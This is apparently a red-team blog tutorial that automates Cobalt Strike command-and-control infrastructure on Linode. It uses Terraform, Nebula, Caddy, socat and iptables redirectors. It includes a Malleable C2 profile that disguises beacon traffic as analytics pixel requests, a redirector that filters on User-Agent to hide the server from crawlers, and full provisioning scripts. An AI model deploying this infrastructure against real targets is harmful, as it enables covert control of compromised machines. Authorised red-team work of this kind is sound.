Now I want to test the SSH key that was moved to the servers by the file provisioner, along with the Nebula network connectivity. I'll start with the team-server instance, so to log in I will use the following command from the src/templates directory.
ssh -i keys/red_nebula_rsa root@66.228.47.96
The SSH key generated by the generate_key.sh script works perfectly, so now to check that Nebula is running on tun0 and that I can ping all the other endpoints using the following commands.
ifconfig | grep tun0
ping -c 1 192.168.100.1
ping -c 1 192.168.100.10
ping -c 1 192.168.100.20
ping -c 1 192.168.100.110
ping -c 1 192.168.100.120
If the commands execute successfully, you should see each host respond to ping and the tun0 interface up. With all tests passing, I'll destroy the build once more using terraform destroy to avoid making changes while the build is still active.
At this point, the build has reached a stable state: the Linode infrastructure automation (including DNS) works, and the end-to-end encrypted Nebula network layer works. Time to focus on traffic routing.
Caddy Setup
To set up the Caddy HTTPS server, I would either need to install the Go language on the edge-redirector-1 instance to build Caddy from source, or simply download the binaries. For this build I will use the binaries from GitHub - https://github.com/caddyserver/caddy - since they are faster to deploy.
Caddy needs a configuration to set up the HTTP/S routing rules as well as SSL. Since the configuration on the HTTP/S and DNS servers needs to match the C2 profile in use, I will use a modified version of Cobalt Strike's webbug_getonly.profile from the Malleable-C2-Profiles repository. The C2 profile will be stored in the src/templates/files directory.
webbug_getonly.profile
set useragent "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.39 Safari/537.36 Brave/75";
set sleeptime "20000";

https-certificate {
    set keystore "acme.store";
    set password "123456";
}

http-get {
    set uri "/___utm.gif";
    client {
        parameter "utmac" "UA-2202604-2";
        parameter "utmcn" "1";
        parameter "utmcs" "ISO-8859-1";
        parameter "utmsr" "1280x1024";
        parameter "utmsc" "32-bit";
        parameter "utmul" "en-US";

        metadata {
            base64url;
            prepend "__utma";
            parameter "utmcc";
        }
    }
    server {
        header "Content-Type" "image/gif";
        output {
            # hexdump pixel.gif
            # 0000000 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00
            # 0000010 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00
            # 0000020 01 00 01 00 00 02 01 44 00 3b
            prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b";
            prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00";
            prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00";
            print;
        }
    }
}

http-post {
    set uri "/__utm.gif";
    set verb "GET";
    client {
        id {
            prepend "UA-220";
            append "-2";
            parameter "utmac";
        }
        parameter "utmcn" "1";
        parameter "utmcs" "ISO-8859-1";
        parameter "utmsr" "1280x1024";
        parameter "utmsc" "32-bit";
        parameter "utmul" "en-US";

        output {
            base64url;
            prepend "__utma";
            parameter "utmcc";
        }
    }
    server {
        header "Content-Type" "image/gif";
        output {
            prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b";
            prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00";
            prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00";
            print;
        }
    }
}

# dress up the staging process too
http-stager {
    set uri_x86 "/_init.gif";
    set uri_x64 "/__init.gif";
    server {
        header "Content-Type" "image/gif";
        output {
            prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b";
            prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00";
            prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00";
            print;
        }
    }
}
Once I've settled on the C2 profile to use, I modify Caddy's configuration to match the routes. Caddy's configuration file, the Caddyfile, is shown below.
Caddyfile
{
    admin off
    acme_ca https://acme-staging-v02.api.letsencrypt.org/directory
}

# Profile: https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/webbug_getonly.profile
# User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.39 Safari/537.36 Brave/75

EDGE_DOMAIN_NAME {
    log

    @user-agent-whitelist {
        header User-Agent *3770.39*
    }

    header {
        -Server
        +X-Robots-Tag "noindex, nofollow, nosnippet, noarchive"
        +X-Content-Type-Options "nosniff"
    }

    handle /_init.gif* {
        reverse_proxy @user-agent-whitelist https://192.168.100.110 {
            transport http {
                tls_insecure_skip_verify
            }
        }
    }

    handle /__init.gif* {
        reverse_proxy @user-agent-whitelist https://192.168.100.110 {
            transport http {
                tls_insecure_skip_verify
            }
        }
    }

    handle /__utm.gif* {
        reverse_proxy @user-agent-whitelist https://192.168.100.110 {
            transport http {
                tls_insecure_skip_verify
            }
        }
    }

    handle /___utm.gif* {
        reverse_proxy @user-agent-whitelist https://192.168.100.110 {
            transport http {
                tls_insecure_skip_verify
            }
        }
    }

    handle /* {
        redir https://docs.microsoft.com/en-us/windows/win32/debug/pe-format permanent
    }
}
The configuration above is fairly simple: traffic is only redirected to the internal-redirector-1 instance when the User-Agent matches the pattern and one of the specific endpoints (_init.gif, __init.gif, __utm.gif, ___utm.gif) is hit. All other requests are redirected to the Microsoft Windows PE format documentation page.
The EDGE_DOMAIN_NAME placeholder above will be fixed at build time, since the following commands will be added to the edge-redirector-1 instance in the edge-redirectors.tf template.
wget https://github.com/caddyserver/caddy/releases/download/v2.5.2/caddy_2.5.2_linux_amd64.tar.gz
tar -C /usr/local/bin -xzf caddy_2.5.2_linux_amd64.tar.gz
chmod +x /usr/local/bin/caddy
mv /tmp/Caddyfile .
sed -i 's/EDGE_DOMAIN_NAME/${var.linode_domain}/g' Caddyfile
echo 'caddy run --watch' | at now + 1 min
The commands above download Caddy and set up the configuration before connecting to the Nebula network.
At this point, I should be able to test all the modifications made above by building the infrastructure and making sure the HTTPS server redirects traffic according to the specific rules.
terraform apply
On success, you should see 14 resources created without errors, along with the output data showing the IP address of each instance created.
All resources are up and running, so let me check the windows.pe domain in a browser to make sure it redirects all non-C2 traffic to the Windows PE format documentation page as intended.
Since I'm using staging certificates during testing, you will see a warning like the one above. The warning goes away once I move to production SSL, but for now I choose to continue.
The request redirects to the Windows PE format documentation page as expected. This page was chosen because I'm using the windows.pe domain name, and most bots and crawlers will assume the page simply redirects to PE format information for Windows binaries.
When hitting the specific endpoints with the User-Agent described in the C2 profile, I get the following response, which is expected since I'm not yet routing traffic through the internal-redirector-1 instance.
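The same checks can be reproduced with curl; a sketch, using -k because the staging certificate is untrusted (the second request is expected to fail at this stage, since nothing answers on the internal redirector yet):

# Non-matching User-Agent on a non-profile path: expect a 301 to the PE format docs
curl -sk -o /dev/null -w '%{http_code} %{redirect_url}\n' https://windows.pe/

# Profile User-Agent against a profile endpoint: proxied toward 192.168.100.110
curl -sk -o /dev/null -w '%{http_code}\n' \
  -A 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.39 Safari/537.36 Brave/75' \
  https://windows.pe/___utm.gif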
Now that I know the HTTPS server configuration works, I can start working on the redirectors.
HTTPS Redirector Setup
To tunnel HTTPS C2 traffic to the team-server instance, I have to make sure every hop has a way to redirect data to the next node. The following path will be used for HTTPS C2 traffic.
edge-redirector-1 --> internal-redirector-1 --> team-server
Currently, the edge-redirector-1 instance is already redirecting HTTPS traffic to the internal-redirector-1 instance using the reverse_proxy directive in the Caddyfile configuration.
The internal-redirector-1 instance needs to tunnel incoming HTTPS traffic on port 443 to the team-server instance, also on port 443. For this particular redirection I will use socat. The following commands will be added to the internal-redirector-1 instance's remote-exec provisioner to install socat and run the command that redirects the traffic.
apt install socat -y
socat TCP4-LISTEN:443,fork TCP4:192.168.100.200:443
The command above starts a listener on port 443 and redirects incoming HTTPS traffic to the team-server instance running on Nebula IP 192.168.100.200.
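A quick way to confirm the relay is up on internal-redirector-1 once it boots; a sketch:

ss -tlnp | grep ':443'  # socat should be listening on 0.0.0.0:443
# With the team server running, a request against this relay should behave
# exactly like one made directly against 192.168.100.200:443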
The C2 team-server will now be able to listen for HTTPS C2 traffic on port 443.
DNS Redirector Setup
To tunnel DNS C2 traffic to the team-server instance, I have to make sure every hop has a way to redirect DNS data to the next node. The following path will be used for DNS C2 traffic.
edge-redirector-2 --> internal-redirector-2 --> team-server
Since these three (3) instances will handle DNS traffic, each of them needs a few commands added to its remote-exec provisioner to remove the systemd-resolved service and add nameserver entries to the /etc/resolv.conf file.
The commands to add are as follows.
systemctl disable systemd-resolved.service
systemctl stop systemd-resolved
rm -f /etc/resolv.conf
echo 'nameserver 8.8.8.8' >> /etc/resolv.conf
echo 'nameserver 8.8.4.4' >> /etc/resolv.conf
With the above commands added to all three instances, I can focus on adding the iptables redirector on the edge-redirector-2 instance, as shown below.
iptables -I INPUT -p udp -m udp --dport 53 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination 192.168.100.120:53
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -I FORWARD -j ACCEPT
iptables -P FORWARD ACCEPT
sysctl net.ipv4.ip_forward=1
The commands above take incoming DNS traffic on UDP port 53 and redirect it to the internal-redirector-2 instance using Nebula IP 192.168.100.120 on port 53.
Now that traffic arrives at the edge-redirector-2 instance and is redirected to the internal-redirector-2 instance via iptables, I need to redirect the incoming DNS traffic to the team-server instance, again using iptables, as shown below.
iptables -I INPUT -p udp -m udp --dport 53 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination 192.168.100.200:53
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -I FORWARD -j ACCEPT
iptables -P FORWARD ACCEPT
sysctl net.ipv4.ip_forward=1
This completes the DNS tunnel from the edge-redirector-2 instance, through the internal-redirector-2 instance, to the team-server instance.
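Once a DNS listener exists on the team server, the path can be spot-checked from any external host; a sketch, noting that a Cobalt Strike DNS listener typically answers A queries with its idle address (0.0.0.0 by default):

dig +short A probe.windows.pe @ns1.windows.pe  # expect 0.0.0.0 once the DNS listener is live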
Firewall Setup
At this point, the last thing to do before moving on to the C2 framework setup is to add firewall rules at the operating-system level for each virtual machine instance, so that nothing is exposed to the internet except the few services required for operations. I will use ufw to write the following rules (a verification sketch follows the list).
Lighthouse (192.168.100.1)

- Allow SSH: ufw allow ssh
- Allow 4242/udp: ufw allow 4242/udp

Edge-Redirector-1 (HTTPS - 192.168.100.10)

- Allow SSH: ufw allow ssh
- Allow HTTP: ufw allow 80
- Allow HTTPS: ufw allow 443
- Allow 4242/udp: ufw allow 4242/udp
- Allow 192.168.100.110: ufw allow from 192.168.100.110

Internal-Redirector-1 (HTTPS - 192.168.100.110)

- Allow SSH: ufw allow ssh
- Allow 4242/udp: ufw allow 4242/udp
- Allow 192.168.100.10: ufw allow from 192.168.100.10
- Allow 192.168.100.200: ufw allow from 192.168.100.200

Edge-Redirector-2 (DNS - 192.168.100.20)

- Allow SSH: ufw allow ssh
- Allow 53/udp: ufw allow 53/udp
- Allow 4242/udp: ufw allow 4242/udp
- Allow 192.168.100.120: ufw allow from 192.168.100.120

Internal-Redirector-2 (DNS - 192.168.100.120)

- Allow SSH: ufw allow ssh
- Allow 4242/udp: ufw allow 4242/udp
- Allow 192.168.100.20: ufw allow from 192.168.100.20
- Allow 192.168.100.200: ufw allow from 192.168.100.200

Team-Server (192.168.100.200)

- Allow SSH: ufw allow ssh
- Allow 4242/udp: ufw allow 4242/udp
- Allow 192.168.100.110: ufw allow from 192.168.100.110
- Allow 192.168.100.120: ufw allow from 192.168.100.120
- Allow 192.168.100.250: ufw allow from 192.168.100.250
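Once the rules are baked into the templates, each host's effective policy can be audited over SSH; a sketch against the team server:

ssh -i keys/red_nebula_rsa root@<team-server-ip> 'ufw status verbose'
# Expect 22 and 4242/udp open to the world, plus the three Nebula peer IPs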
With all of the above rules written for each instance using ufw, the final versions of the lighthouse.tf, edge-redirectors.tf, and internal-redirectors.tf templates are complete, as shown below. The team-server.tf template will be finished in the next section on the C2 framework setup.
lighthouse.tf
resource"linode_instance""lighthouse" {label = "lighthouse" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "file" {source = "keys/red_nebula_rsa.pub" destination = "/tmp/key.pub" } provisioner "file" {source = "configs/nebula/config-lighthouse.yaml" destination = "/tmp/config.yaml" } provisioner "file" {source = "certificates/ca.crt" destination = "/tmp/ca.crt" } provisioner "file" {source = "certificates/lighthouse1.crt" destination = "/tmp/host.crt" } provisioner "file" {source = "certificates/lighthouse1.key" destination = "/tmp/host.key" } provisioner "file" {source = "/tmp/nebula/nebula" destination = "/tmp/nebula" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","ufw allow 22","ufw allow 4242/udp","cat /tmp/key.pub >> /root/.ssh/authorized_keys","rm /tmp/key.pub","mkdir /etc/nebula","mv /tmp/host.* /etc/nebula","mv /tmp/ca.crt /etc/nebula","mv /tmp/config.yaml /etc/nebula","mv /tmp/nebula /etc/nebula/nebula","chmod +x /etc/nebula/nebula","echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min","echo 'ufw --force enable' | at now + 1 min","touch /tmp/task.complete" ] }}
edge-redirectors.tf
# HTTPS Dedicated Redirector
resource "linode_instance" "edge-redirector-1" {
  label           = "edge-redirector-1"
  image           = "linode/ubuntu18.04"
  region          = "us-east"
  type            = "g6-nanode-1"
  authorized_keys = [linode_sshkey.ssh_key.ssh_key]
  root_pass       = random_string.random.result
  swap_size       = 256
  private_ip      = false
  depends_on      = [linode_instance.lighthouse]

  connection {
    host        = self.ip_address
    user        = "root"
    type        = "ssh"
    private_key = tls_private_key.temp_key.private_key_pem
    timeout     = "10m"
  }

  provisioner "file" {
    source      = "keys/red_nebula_rsa.pub"
    destination = "/tmp/key.pub"
  }
  provisioner "file" {
    source      = "configs/nebula/config-edge.yaml"
    destination = "/tmp/config.yaml"
  }
  provisioner "file" {
    source      = "configs/web/Caddyfile.txt"
    destination = "/tmp/Caddyfile"
  }
  provisioner "file" {
    source      = "certificates/ca.crt"
    destination = "/tmp/ca.crt"
  }
  provisioner "file" {
    source      = "certificates/edge-redirector-1.crt"
    destination = "/tmp/host.crt"
  }
  provisioner "file" {
    source      = "certificates/edge-redirector-1.key"
    destination = "/tmp/host.key"
  }
  provisioner "file" {
    source      = "/tmp/nebula/nebula"
    destination = "/tmp/nebula"
  }

  provisioner "remote-exec" {
    inline = [
      "export PATH=$PATH:/usr/local/bin",
      "export DEBIAN_FRONTEND=noninteractive",
      "apt-get update",
      "yes | apt-get upgrade",
      "ufw allow 22",
      "ufw allow 80",
      "ufw allow 443",
      "ufw allow 4242/udp",
      "ufw allow from 192.168.100.110",
      "cat /tmp/key.pub >> /root/.ssh/authorized_keys",
      "rm /tmp/key.pub",
      "mkdir /etc/nebula",
      "mv /tmp/host.* /etc/nebula",
      "mv /tmp/ca.crt /etc/nebula",
      "mv /tmp/config.yaml /etc/nebula",
      "mv /tmp/nebula /etc/nebula/nebula",
      "wget https://github.com/caddyserver/caddy/releases/download/v2.5.2/caddy_2.5.2_linux_amd64.tar.gz",
      "tar -C /usr/local/bin -xzf caddy_2.5.2_linux_amd64.tar.gz",
      "chmod +x /usr/local/bin/caddy",
      "mv /tmp/Caddyfile .",
      "sed -i 's/EDGE_DOMAIN_NAME/${var.linode_domain}/g' Caddyfile",
      "echo 'caddy run --watch' | at now + 1 min",
      "sed -i 's/LIGHTHOUSE_IP_ADDRESS/${linode_instance.lighthouse.ip_address}/g' /etc/nebula/config.yaml",
      "chmod +x /etc/nebula/nebula",
      "echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min",
      "echo 'ufw --force enable' | at now + 1 min",
      "touch /tmp/task.complete"
    ]
  }
}

# DNS Dedicated Redirector
resource "linode_instance" "edge-redirector-2" {
  label           = "edge-redirector-2"
  image           = "linode/ubuntu18.04"
  region          = "us-east"
  type            = "g6-nanode-1"
  authorized_keys = [linode_sshkey.ssh_key.ssh_key]
  root_pass       = random_string.random.result
  swap_size       = 256
  private_ip      = false
  depends_on      = [linode_instance.lighthouse]

  connection {
    host        = self.ip_address
    user        = "root"
    type        = "ssh"
    private_key = tls_private_key.temp_key.private_key_pem
    timeout     = "10m"
  }

  provisioner "file" {
    source      = "keys/red_nebula_rsa.pub"
    destination = "/tmp/key.pub"
  }
  provisioner "file" {
    source      = "configs/nebula/config-edge.yaml"
    destination = "/tmp/config.yaml"
  }
  provisioner "file" {
    source      = "certificates/ca.crt"
    destination = "/tmp/ca.crt"
  }
  provisioner "file" {
    source      = "certificates/edge-redirector-2.crt"
    destination = "/tmp/host.crt"
  }
  provisioner "file" {
    source      = "certificates/edge-redirector-2.key"
    destination = "/tmp/host.key"
  }
  provisioner "file" {
    source      = "/tmp/nebula/nebula"
    destination = "/tmp/nebula"
  }

  provisioner "remote-exec" {
    inline = [
      "export PATH=$PATH:/usr/local/bin",
      "export DEBIAN_FRONTEND=noninteractive",
      "apt-get update",
      "yes | apt-get upgrade",
      "ufw allow 22",
      "ufw allow 53/udp",
      "ufw allow 4242/udp",
      "ufw allow from 192.168.100.120",
      "cat /tmp/key.pub >> /root/.ssh/authorized_keys",
      "rm /tmp/key.pub",
      "mkdir /etc/nebula",
      "mv /tmp/host.* /etc/nebula",
      "mv /tmp/ca.crt /etc/nebula",
      "mv /tmp/config.yaml /etc/nebula",
      "mv /tmp/nebula /etc/nebula/nebula",
      "systemctl disable systemd-resolved.service",
      "systemctl stop systemd-resolved",
      "rm -f /etc/resolv.conf",
      "echo 'nameserver 8.8.8.8' >> /etc/resolv.conf",
      "echo 'nameserver 8.8.4.4' >> /etc/resolv.conf",
      "iptables -I INPUT -p udp -m udp --dport 53 -j ACCEPT",
      "iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination 192.168.100.120:53",
      "iptables -t nat -A POSTROUTING -j MASQUERADE",
      "iptables -I FORWARD -j ACCEPT",
      "iptables -P FORWARD ACCEPT",
      "sysctl net.ipv4.ip_forward=1",
      "sed -i 's/LIGHTHOUSE_IP_ADDRESS/${linode_instance.lighthouse.ip_address}/g' /etc/nebula/config.yaml",
      "chmod +x /etc/nebula/nebula",
      "echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min",
      "echo 'ufw --force enable' | at now + 1 min",
      "touch /tmp/task.complete"
    ]
  }
}
internal-redirectors.tf
# HTTPS Dedicated Internal Redirector
resource "linode_instance" "internal-redirector-1" {
  label           = "internal-redirector-1"
  image           = "linode/ubuntu18.04"
  region          = "us-east"
  type            = "g6-nanode-1"
  authorized_keys = [linode_sshkey.ssh_key.ssh_key]
  root_pass       = random_string.random.result
  swap_size       = 256
  private_ip      = false
  depends_on      = [linode_instance.lighthouse]

  connection {
    host        = self.ip_address
    user        = "root"
    type        = "ssh"
    private_key = tls_private_key.temp_key.private_key_pem
    timeout     = "10m"
  }

  provisioner "file" {
    source      = "keys/red_nebula_rsa.pub"
    destination = "/tmp/key.pub"
  }
  provisioner "file" {
    source      = "configs/nebula/config-internal.yaml"
    destination = "/tmp/config.yaml"
  }
  provisioner "file" {
    source      = "certificates/ca.crt"
    destination = "/tmp/ca.crt"
  }
  provisioner "file" {
    source      = "certificates/internal-redirector-1.crt"
    destination = "/tmp/host.crt"
  }
  provisioner "file" {
    source      = "certificates/internal-redirector-1.key"
    destination = "/tmp/host.key"
  }
  provisioner "file" {
    source      = "/tmp/nebula/nebula"
    destination = "/tmp/nebula"
  }

  provisioner "remote-exec" {
    inline = [
      "export PATH=$PATH:/usr/local/bin",
      "export DEBIAN_FRONTEND=noninteractive",
      "apt-get update",
      "yes | apt-get upgrade",
      "ufw allow 22",
      "ufw allow 4242/udp",
      "ufw allow from 192.168.100.10",
      "ufw allow from 192.168.100.200",
      "apt install socat -y",
      "cat /tmp/key.pub >> /root/.ssh/authorized_keys",
      "rm /tmp/key.pub",
      "mkdir /etc/nebula",
      "mv /tmp/host.* /etc/nebula",
      "mv /tmp/ca.crt /etc/nebula",
      "mv /tmp/config.yaml /etc/nebula",
      "mv /tmp/nebula /etc/nebula/nebula",
      "sed -i 's/LIGHTHOUSE_IP_ADDRESS/${linode_instance.lighthouse.ip_address}/g' /etc/nebula/config.yaml",
      "chmod +x /etc/nebula/nebula",
      "echo 'socat TCP4-LISTEN:443,fork TCP4:192.168.100.200:443' | at now + 1 min",
      "echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min",
      "echo 'ufw --force enable' | at now + 1 min",
      "touch /tmp/task.complete"
    ]
  }
}

# DNS Dedicated Internal Redirector
resource "linode_instance" "internal-redirector-2" {
  label           = "internal-redirector-2"
  image           = "linode/ubuntu18.04"
  region          = "us-east"
  type            = "g6-nanode-1"
  authorized_keys = [linode_sshkey.ssh_key.ssh_key]
  root_pass       = random_string.random.result
  swap_size       = 256
  private_ip      = false
  depends_on      = [linode_instance.lighthouse]

  connection {
    host        = self.ip_address
    user        = "root"
    type        = "ssh"
    private_key = tls_private_key.temp_key.private_key_pem
    timeout     = "10m"
  }

  provisioner "file" {
    source      = "keys/red_nebula_rsa.pub"
    destination = "/tmp/key.pub"
  }
  provisioner "file" {
    source      = "configs/nebula/config-internal.yaml"
    destination = "/tmp/config.yaml"
  }
  provisioner "file" {
    source      = "certificates/ca.crt"
    destination = "/tmp/ca.crt"
  }
  provisioner "file" {
    source      = "certificates/internal-redirector-2.crt"
    destination = "/tmp/host.crt"
  }
  provisioner "file" {
    source      = "certificates/internal-redirector-2.key"
    destination = "/tmp/host.key"
  }
  provisioner "file" {
    source      = "/tmp/nebula/nebula"
    destination = "/tmp/nebula"
  }

  provisioner "remote-exec" {
    inline = [
      "export PATH=$PATH:/usr/local/bin",
      "export DEBIAN_FRONTEND=noninteractive",
      "apt-get update",
      "yes | apt-get upgrade",
      "ufw allow 22",
      "ufw allow 4242/udp",
      "ufw allow from 192.168.100.20",
      "ufw allow from 192.168.100.200",
      "cat /tmp/key.pub >> /root/.ssh/authorized_keys",
      "rm /tmp/key.pub",
      "mkdir /etc/nebula",
      "mv /tmp/host.* /etc/nebula",
      "mv /tmp/ca.crt /etc/nebula",
      "mv /tmp/config.yaml /etc/nebula",
      "mv /tmp/nebula /etc/nebula/nebula",
      "systemctl disable systemd-resolved.service",
      "systemctl stop systemd-resolved",
      "rm -f /etc/resolv.conf",
      "echo 'nameserver 8.8.8.8' >> /etc/resolv.conf",
      "echo 'nameserver 8.8.4.4' >> /etc/resolv.conf",
      "iptables -I INPUT -p udp -m udp --dport 53 -j ACCEPT",
      "iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination 192.168.100.200:53",
      "iptables -t nat -A POSTROUTING -j MASQUERADE",
      "iptables -I FORWARD -j ACCEPT",
      "iptables -P FORWARD ACCEPT",
      "sysctl net.ipv4.ip_forward=1",
      "sed -i 's/LIGHTHOUSE_IP_ADDRESS/${linode_instance.lighthouse.ip_address}/g' /etc/nebula/config.yaml",
      "chmod +x /etc/nebula/nebula",
      "echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min",
      "echo 'ufw --force enable' | at now + 1 min",
      "touch /tmp/task.complete"
    ]
  }
}
With the firewall rules in place and the templates above complete, I can now finally focus on the team-server instance.
C2 Setup
The first thing I'll do is add cobaltstrike.zip to the src/templates/files directory, since it needs to be moved to the team-server instance.
Now, I need to create a Java KeyStore using the SSL key and crt files that Caddy generated while setting up the HTTP/S server. These files are stored at a specific location on the edge-redirector-1 instance, so I need to add a few commands to the remote-exec provisioner to scp those files over to the team-server instance, where they can be used for the Java KeyStore setup.
I also need two new file provisioners that move cobaltstrike.zip and webbug_getonly.profile from the operator host to the /tmp directory on the team-server instance. But first, I need to install Java on the team-server instance.
apt install openjdk-17-jre -y
To scp the SSL keys off the edge-redirector-1 instance, I need the private key from the tls_private_key resource created in the security.tf file during an earlier development step.
echo '${tls_private_key.temp_key.private_key_pem}' > /root/temp_key
With the key stored in /root/temp_key, I can scp the files after tightening the key file's permissions with chmod.
chmod 600 /root/temp_key
scp -oStrictHostKeyChecking=no -i /root/temp_key root@${linode_instance.edge-redirector-1.ip_address}:/root/.local/share/caddy/certificates/acme-staging-v02.api.letsencrypt.org-directory/${var.linode_domain}/* .
Note: the directory at /root/.local/share/caddy/certificates/acme-staging-v02.api.letsencrypt.org-directory/ will likely change when you switch to production-grade SSL certificates, but for testing purposes this directory is fine.
Once the keys are on the team-server instance, I need to combine the separate public and private files into a single PKCS12 file using openssl, as shown below.
openssl pkcs12 -inkey ${var.linode_domain}.key -in ${var.linode_domain}.crt -export -out acme.pkcs12 -passout pass:123456
Once the acme.pkcs12 file is generated, the PKCS12 file can be converted into a Java KeyStore using the keytool utility, as shown below.
keytool -noprompt -importkeystore -srckeystore acme.pkcs12 -srcstoretype pkcs12 -destkeystore acme.store -deststorepass 123456 -destkeypass 123456 -srcstorepass 123456
The command above generates the acme.store file that will be used as part of the C2 profile, so I will move it into the /opt/cobaltstrike4.4/ directory. The last command to run starts the teamserver using acme.store and webbug_getonly.profile.
cd /opt/cobaltstrike4.4/ && ./teamserver 192.168.100.200 password! webbug_getonly.profile
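If the teamserver ever fails to start over SSL, the keystore itself is the first thing to check; a sketch:

keytool -list -keystore /opt/cobaltstrike4.4/acme.store -storepass 123456
# Expect a single PrivateKeyEntry holding the domain's certificate chain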
Note: any of the passwords used in this build can of course be easily replaced, or fully automated by adding two more random_string resources to the security.tf template, but for the demonstration they are fine as defaults.
Here is the team-server.tf template after the modifications above.
team-server.tf
resource"linode_instance""team-server" {label = "team-server" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [linode_instance.lighthouse] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "file" {source = "keys/red_nebula_rsa.pub" destination = "/tmp/key.pub" } provisioner "file" {source = "configs/nebula/config-teamserver.yaml" destination = "/tmp/config.yaml" } provisioner "file" {source = "certificates/ca.crt" destination = "/tmp/ca.crt" } provisioner "file" {source = "certificates/team-server.crt" destination = "/tmp/host.crt" } provisioner "file" {source = "certificates/team-server.key" destination = "/tmp/host.key" } provisioner "file" {source = "/tmp/nebula/nebula" destination = "/tmp/nebula" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","apt-get install unzip -y","apt-get install openjdk-17-jre -y","apt-get install openjdk-17-jre -y", # short-cut to set as default"ufw allow 22","ufw allow 4242/udp","ufw allow from 192.168.100.110","ufw allow from 192.168.100.120","ufw allow from 192.168.100.250","cat /tmp/key.pub >> /root/.ssh/authorized_keys","rm /tmp/key.pub","mkdir /etc/nebula","mv /tmp/host.* /etc/nebula","mv /tmp/ca.crt /etc/nebula","mv /tmp/config.yaml /etc/nebula","mv /tmp/nebula /etc/nebula/nebula","mv /tmp/cobaltstrike.zip .","unzip cobaltstrike.zip -d /opt","mv /tmp/webbug_getonly.profile /opt/cobaltstrike4.4/","echo '${tls_private_key.temp_key.private_key_pem}' > /root/temp_key","chmod 600 /root/temp_key","scp -oStrictHostKeyChecking=no -i /root/temp_key root@${linode_instance.edge-redirector-1.ip_address}:/root/.local/share/caddy/certificates/acme-staging-v02.api.letsencrypt.org-directory/${var.linode_domain}/* .","openssl pkcs12 -inkey ${var.linode_domain}.key -in ${var.linode_domain}.crt -export -out acme.pkcs12 -passout pass:123456","keytool -noprompt -importkeystore -srckeystore acme.pkcs12 -srcstoretype pkcs12 -destkeystore acme.store -deststorepass 123456 -destkeypass 123456 -srcstorepass 123456","cp acme.store /opt/cobaltstrike4.4/","systemctl disable systemd-resolved.service","systemctl stop systemd-resolved","rm -f /etc/resolv.conf","echo 'nameserver 8.8.8.8' >> /etc/resolv.conf","echo 'nameserver 8.8.4.4' >> /etc/resolv.conf","sed -i 's/LIGHTHOUSE_IP_ADDRESS/${linode_instance.lighthouse.ip_address}/g' /etc/nebula/config.yaml","chmod +x /etc/nebula/nebula","echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min","echo 'cd /opt/cobaltstrike4.4/ && ./teamserver 192.168.100.200 password! webbug_getonly.profile' | at now + 1 min","echo 'ufw --force enable' | at now + 1 min","touch /tmp/task.complete" ] }}
So let me fire it up one more time to verify everything works.
terraform apply
ssh -i keys/red_nebula_rsa root@172.104.29.249
Then check whether the teamserver is running on port 50050 with the following command.
ss -tupln
Success! The teamserver is running, showing as java on port 50050. This means the SSL certificates were copied correctly, the new KeyStore was built, and the C2 profile was fully loaded and is ready to go!
I'm almost done with the C2 automation build; all that's left is to connect an operator and test the HTTPS and DNS beacons.
Operator Setup
With the C2 infrastructure built and ready for action, an operator only needs to add the "Lighthouse" IP address to the config-operator.yaml configuration file located in the /tmp/nebula directory. I did not automate this step because operators will likely not be on the same machine that built the infrastructure. All any operator needs is the config-operator.yaml file along with the 3 keys associated with that operator, which are also located in the /tmp/nebula directory.
sed -i 's/LIGHTHOUSE_IP_ADDRESS/172.104.29.143/g' config-operator.yaml
Once the IP is set, the following command connects to the Nebula network.
sudo ./nebula -config config-operator.yaml
The connection is good, and the operator can now reach the team-server instance on port 50050.
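Before launching the client, connectivity from the operator box can be confirmed with the same kinds of checks used earlier; a sketch:

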